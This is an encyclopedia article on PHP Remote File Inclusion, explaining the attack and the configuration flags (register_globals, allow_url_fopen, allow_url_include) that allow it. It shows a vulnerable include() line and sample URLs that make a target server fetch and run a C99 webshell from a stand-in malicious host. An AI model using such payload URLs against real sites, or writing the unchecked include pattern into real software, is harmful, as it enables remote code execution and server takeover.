- Remote File Inclusion
Remote File Inclusion (RFI) is a technique used to attack
Internet websites from a remote computer. With malicious intent, it can be combined with the usage ofXSA to harm a webserver.How the attack works
Remote File Inclusion attacks allow malicious users to run their own
PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:"include($page . '.php');"
This line of PHP code, is then used in URLs like the following example:
"
http://www.vulnerable.example.org/index.php?page=archive "Because the
$page
variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example:"
http://www.vulnerable.example.org/index.php?page=http://www.malicious.example.com/C99.php? "The
include()
function above instructs the server to retrieveC99.php
from the remote server and run its code. This is possible because PHP allows the user to load both remote and local content with the same functions. The code sample above does not perform any checks on the content of the$page
variable, it blindly passes it to the function.Because the original piece of code appended.php
to the file it would try to fetch the following URL"
http://www.malicious.example.com/C99.php .php"As the attackers can not know what the original code might append, they put a question mark at the end of the URLs. This makes the script fetch the intended file, with the appended string as a parameter (which is ignored by the attackers script):
"
http://www.malicious.example.com/C99.php?.php "This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Scripts that send Spam are also very common. Potentially, the attacker could even use the webshell to gain administrator-level, or
root , access on the server.Why the attack works
RFI attacks are possible because of several PHP configuration flags:
* One is called
register_globals
.register_globals
automatically defines variables in the script that are entered in the page URL. In this example, the$page
variable will automatically be filled with
before the script is executed. Because of this security vulnerability,http://malicious.code.com/C99.txt?archive.php register_globals
is set to OFF by default on newer servers.
* Another one, even more relevant to this attack, isallow_url_fopen
. This defines if PHP should be able to fetch remote content in almost any function that takes a filename as a parameter. In PHP 5.2 this setting was separated for theinclude()
family of functions and calledallow_url_include
. This specifically addresses the fact that the attack described here makes up the majority of security holes in current PHP software.ee also
*
Code injection External links
* [http://php.net/include PHP: include()]
* [http://php.net/register_globals PHP: Using Register Globals]
* [http://php.net/manual/en/filesystem.configuration.php#ini.allow-url-fopen PHP: Filesystem Functions: allow-url-fopen]
Wikimedia Foundation. 2010.